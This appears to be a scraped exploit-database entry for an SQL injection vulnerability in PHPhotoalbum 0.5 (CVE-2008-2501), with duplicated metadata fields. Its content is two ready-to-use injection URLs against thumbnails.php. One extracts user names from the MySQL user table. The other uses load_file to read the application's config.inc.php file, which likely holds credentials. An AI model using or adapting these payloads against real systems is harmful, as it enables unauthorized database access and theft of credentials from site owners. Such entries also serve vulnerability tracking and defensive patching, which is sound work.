PHPhotoalbum 0.5 - SQL Injection
| EKU-ID: 18114 | CVE: CVE-2008-2501;OSVDB-45677 | OSVDB-ID: |
| Author: Stack | Published: 2009-12-21 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 18114 | CVE: CVE-2008-2501;OSVDB-45677 | OSVDB-ID: |
| Author: Stack | Published: 2009-12-21 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Title: PHPhotoalbum Remote sql injection Vulnerability # Tested on: windows http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user-- http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--